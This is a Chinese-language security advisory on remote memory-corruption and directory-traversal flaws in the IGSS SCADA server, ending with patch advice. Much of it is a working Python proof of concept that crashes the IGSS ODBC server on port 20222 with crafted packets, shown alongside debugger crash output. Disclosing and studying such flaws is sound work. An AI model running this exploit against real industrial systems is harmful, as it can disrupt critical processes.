安全研究
安全漏洞
7T Interactive Graphical SCADA System畸形报文远程内存破坏漏洞
发布日期:2011-02-10
更新日期:2011-03-23
受影响系统:
7-Technologies 7-Technologies Interactive Graphical SCADA System 9描述:
7-Technologies 7-Technologies Interactive Graphical SCADA System 8
BUGTRAQ ID: 46310
IGSS是用于监控工业流程的SCADA系统。
7T Interactive Graphical SCADA System在处理畸形报文时存在远程内存破坏漏洞,远程攻击者可利用此漏洞以管理员权限执行执行任意代码,完全控制受影响系统,造成拒绝服务。
1) 处理某些命令时,IGSSdataServer.exe中存在输入验证错误,可通过包含发送到TCP端口12401的目录遍历说明符的特制报文读取和编写任意文件。
2)处理"ListAll"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
3)处理"Write file"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
4)处理"ReadFile"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
5)处理"Delete"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
6)处理"RenameFile"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
7)处理"FileInfo"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
8)处理RMS Reports "Add"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
9)处理RMS Reports "ReadFile"命令和"Write file"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出。
10)处理RMS Reports "Rename"命令时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈冲区溢出。
11)使用"logText()"函数(shmemmgr9.dll)创建日志消息时 IGSSdataServer.exe 存在格式字符串错误,通过发送到TCP端口12401的特制RMS Reports "Delete"命令造成进程崩溃。
12)在创建处理STDREP更新请求的SQL请求字符串时IGSSdataServer.exe中存在边界错误,可通过包含发送到TCP端口12401的特制报文造成栈缓冲区溢出
13)处理某些命令时存在输入验证错误,可通过包含发送到TCP端口12401的目录遍历说明符的特制报文在系统上执行任意程序。
<*来源:Jeremy Brown
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
# igss.py
# IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
# server. By sending a specially crafted packet to listening port 20222, it is
# possible to crash the server. Execution of arbitrary code is unlikely.
#
# Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
#
# HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc int 3
# 0:002> g
# Heap corruption detected at 00175008
# Heap corruption detected at 00177F78
# Heap corruption detected at 001733D8
# (f10.cf8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
# eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# ntdll!RtlFreeHeapSlowly+0x392:
# 7c9276fc 8901 mov dword ptr [ecx],eax ds:0023:feeefeee=????????
# 0:002> kb
# ChildEBP RetAddr Args to Child
# 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
# 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
# 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
# 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
# *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
# 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
# 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
# 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
#
# feeefeee = freed memory
#
# RtlFreeHeap() takes three arguments:
# HeapHandle --> 0x173398
# Flags --> 0x00000001
# HeapBase --> 0x173398
#
# HeapBase is the pointer to the memory block that is going to be freed.
#
# 0:002> dd 173398
# 00173398 001733d8 -----------------------------
# 001733a8 feeefeee feeefeee feeefeee feeefeee -
# 001733b8 feeefeee feeefeee feeefeee feeefeee -
# 001733c8 feeefeee feeefeee feeefeee feeefeee -
# 001733d8 feeefeee feeefeee feeefeee feeefeee <-
# 001733e8 feeefeee feeefeee feeefeee feeefeee
# 001733f8 feeefeee feeefeee feeefeee feeefeee
# 00173408 feeefeee feeefeee feeefeee feeefeee
#
# In this example, the pointer to free happens to point to free memory.
#
# Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
#
# Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
# http://www.syware.com/download/drdeebee/gold_bug.txt
#
import sys
import socket
req_1=(
"\x00\x00\x00\x34"
"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
"\x00\x02\x20\x00"
)
req_2=(
"\x00\x00\x00\xff"+ # length
"\x16"+ # switch code
"\x77" * 254+ # begin query here
"\x88\x99\xaa\xbb" # test
)
if len(sys.argv)!=2:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)
target=sys.argv[1]
port=20222
cs=target,port
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.settimeout(1)
sock.send(req_1)
try:
resp=sock.recv(1024)
print "resp_1 = %s\n"%resp.encode("hex")
except: pass
sock.send(req_2)
try:
resp=sock.recv(1024)
print "resp_2 = %s\n"%resp.encode("hex")
except: pass
sock.close()
建议:
厂商补丁:
7-Technologies
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.igss.com/
浏览次数:3426
严重程度:0(网友投票)
绿盟科技给您安全的保障